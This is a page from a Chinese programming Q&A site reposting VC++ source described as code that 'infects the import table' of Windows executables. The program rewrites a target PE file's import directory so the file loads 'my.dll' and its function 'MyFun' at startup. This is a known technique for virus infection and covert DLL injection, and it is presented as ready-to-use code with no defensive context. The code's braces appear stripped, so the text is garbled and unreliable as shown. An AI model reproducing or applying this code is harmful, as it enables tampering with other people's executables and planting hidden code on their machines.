当前位置:编程学习 > VC++ >>

一段感染引入表的vc代码

文章作者:[E.S.T] 认真的雪  



#include <stdio.h>  
#include <windows.h>  


DWORD RVAToOffset(LPVOID lpBase,DWORD VirtualAddress)  

IMAGE_DOS_HEADER *dosHeader;  
IMAGE_NT_HEADERS *ntHeader;  
IMAGE_SECTION_HEADER *sectionHeader;  
int NumOfSections;  
dosHeader=(IMAGE_DOS_HEADER*)lpBase;  
ntHeader=(IMAGE_NT_HEADERS*)((BYTE*)lpBase+dosHeader->e_lfanew);  
NumOfSections=ntHeader->FileHeader.NumberOfSections;  
for (int i=0;i<NumOfSections;i++)  

sectionHeader=(IMAGE_SECTION_HEADER*)((BYTE*)lpBase+dosHeader->e_lfanew+sizeof(IMAGE_NT_HEADERS))+i;  
if(VirtualAddress>sectionHeader->VirtualAddress&&VirtualAddress<sectionHeader->VirtualAddress+sectionHeader->SizeOfRawData)  

DWORD AposRAV=VirtualAddress-sectionHeader->VirtualAddress;  
DWORD Offset=sectionHeader->PointerToRawData+AposRAV;  
return Offset;  


return 0;  


int sectionNum(LPVOID lpBase,DWORD VirtualAddress)  

IMAGE_DOS_HEADER *dosHeader;  
IMAGE_NT_HEADERS *ntHeader;  
IMAGE_SECTION_HEADER *sectionHeader;  
int NumOfSections;  
dosHeader=(IMAGE_DOS_HEADER*)lpBase;  
ntHeader=(IMAGE_NT_HEADERS*)((BYTE*)lpBase+dosHeader->e_lfanew);  
NumOfSections=ntHeader->FileHeader.NumberOfSections;  
for (int i=0;i<NumOfSections;i++)  

sectionHeader=(IMAGE_SECTION_HEADER*)((BYTE*)lpBase+dosHeader->e_lfanew+sizeof(IMAGE_NT_HEADERS))+i;  
if(VirtualAddress>sectionHeader->VirtualAddress&&VirtualAddress<sectionHeader->VirtualAddress+sectionHeader->SizeOfRawData)  


return i;  


return -1;  



int main(int argc, char* argv[])  


HANDLE hFile=CreateFile(argv[1],GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);  
if(hFile==INVALID_HANDLE_VALUE)  

printf("CreateFile Failed
");  
return 0;  


HANDLE hMap=CreateFileMapping(hFile,NULL,PAGE_READWRITE,NULL,NULL,NULL);  
if(hMap==INVALID_HANDLE_VALUE)  

printf("CreateFileMapping Failed
");  
return 0;  


LPVOID lpBase=MapViewOfFile(hMap,FILE_MAP_WRITE,0,0,0);  
if(lpBase==NULL)  

printf("MapViewOfFile Failed
");  
return 0;   

IMAGE_DOS_HEADER *dosHeader;  
IMAGE_NT_HEADERS *ntHeader;  
dosHeader=(IMAGE_DOS_HEADER*)lpBase;  


if (dosHeader->e_magic!=IMAGE_DOS_SIGNATURE)  

printf("This is not a windows file
");  
return 0;  


ntHeader=(IMAGE_NT_HEADERS*)((BYTE*)lpBase+dosHeader->e_lfanew);  
if(ntHeader->Signature!=IMAGE_NT_SIGNATURE)  

printf("This is not a win32 file
");  
return 0;  

int numOfSections=ntHeader->FileHeader.NumberOfSections;  


int ncout=sectionNum(lpBase,ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);  
if(ncout==-1)  

printf("get section failed
");  
return 0;  

IMAGE_SECTION_HEADER *sectionHeader;  
sectionHeader=(IMAGE_SECTION_HEADER*)((BYTE*)lpBase+dosHeader->e_lfanew+sizeof(IMAGE_NT_HEADERS))+ncout;  
int nullsize=sectionHeader->SizeOfRawData-sectionHeader->Misc.VirtualSize;  
printf("%d
",nullsize);  
IMAGE_IMPORT_DESCRIPTOR *ImportDec=(IMAGE_IMPORT_DESCRIPTOR*)((BYTE*)lpBase+RVAToOffset(lpBase,ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress));  
int i=0;  
while(ImportDec->FirstThunk)  

i++;  
ImportDec++;  

if(i*20+20*3+8+8>nullsize)  

printf("file space is not enough
");  
return 0;  

IMAGE_IMPORT_DESCRIPTOR *newImport;  
newImport=(IMAGE_IMPORT_DESCRIPTOR *)((BYTE*)lpBase+sectionHeader->PointerToRawData+sectionHeader->Misc.VirtualSize);  
printf("%x
",sectionHeader->PointerToRawData+sectionHeader->Misc.VirtualSize);  
printf("%d
",sizeof(IMAGE_IMPORT_DESCRIPTOR));  
ImportDec=(IMAGE_IMPORT_DESCRIPTOR*)((BYTE*)lpBase+RVAToOffset(lpBase,ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress));  
i=0;  
while(ImportDec->FirstThunk)  

*newImport=*ImportDec;  
i++;  
ImportDec++;  
newImport++;  

IMAGE_IMPORT_DESCRIPTOR myImport;  
char *name="my.dll";  
myImport.FirstThunk=(DWORD)(sectionHeader->Misc.VirtualSize+sectionHeader->VirtualAddress+sizeof(IMAGE_IMPORT_DESCRIPTOR)*(i+2)+20);  
myImport.TimeDateStamp=0;  
myImport.ForwarderChain=0;  
myImport.OriginalFirstThunk=(DWORD)(sectionHeader->Misc.VirtualSize+sectionHeader->PointerToRawData+sizeof(IMAGE_IMPORT_DESCRIPTOR)*(i+2)+20);  
myImport.Name=(DWORD)(sectionHeader->Misc.VirtualSize+sectionHeader->VirtualAddress+sizeof(IMAGE_IMPORT_DESCRIPTOR)*(i+2));  
*newImport=myImport;  
newImport++;  
memset(newImport,0,sizeof(IMAGE_IMPORT_DESCRIPTOR));  
newImport++;  
memcpy((char*)newImport,name,strlen(name)+1);  
DWORD newThunk;  
newThunk=(DWORD)newImport+20;  
*(DWORD*)newThunk=(DWORD)(sectionHeader->Misc.VirtualSize+sectionHeader->VirtualAddress+sizeof(IMAGE_IMPORT_DESCRIPTOR)*(i+2)+20+8);  
memset((void*)(newThunk+4),0,4);  
newThunk=newThunk+8;  
WORD hint=0x00;  
*(WORD*)newThunk=hint;  
newThunk=newThunk+sizeof(WORD);  
char *funname="MyFun";  
memcpy((char*)newThunk,funname,strlen(funname)+2);  
ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress=sectionHeader->Misc.VirtualSize+sectionHeader->VirtualAddress;  
FlushViewOfFile(lpBase,0);  
UnmapViewOfFile(lpBase);  
CloseHandle(hMap);  
CloseHandle(hFile);  
return 0;  
} 
补充:软件开发 , Vc ,

上一个:matlab 7与vc/mfc混合编程 脱离运行环境,移植代码
下一个:VC++批量注释小技巧

更多图片编程知识:
更多VC++疑问解答:
VC++ 算法。
MFC CListCtrl获取列数出错了,怎么回事?
谁有VC++6.0企业版中文版的下载地址
vc++,关于TextOut的一个小问题
定义一个三维的CStringArray//一定要使用CArray模板?那操作的时候,使用那个类的函数对数组进行操作呢?
关于mfc消息映射的问题
MFC中用TextOut输出的问题
请问如何在VC6.0里MFC下对万年历进行编程
iArray.Add(iValue);//Add函数的参数不可以用CArray模板???
'USES_CONVERSION' : undeclared identifier;'A2W' : undeclared identifier
vc6.0能不能用CImage,能的话给个例子,以及atlimage.h,
VC 对话框 标题栏 怎么变成这个样子????如图!
spin控件的UDN_DELTAPOS消息//下面代码什么作用? [
VC修改DNF
vc 套接字 struct
asp
php
Delphi
Matlab
JSP
Foxpro
JS
C/C++
C#/ASP.NET
VC++
JAVA
VB
汇编语言
html/css
CGI
XML/UML
wap
网站相关
网页素材
python
微信小程序
thinkphp
如果你遇到编程学习难题:
访问www.zzzyk.com 试试
CopyRight © 2022 站长资源库 编程知识问答 zzzyk.com All Rights Reserved
部分文章来自网络,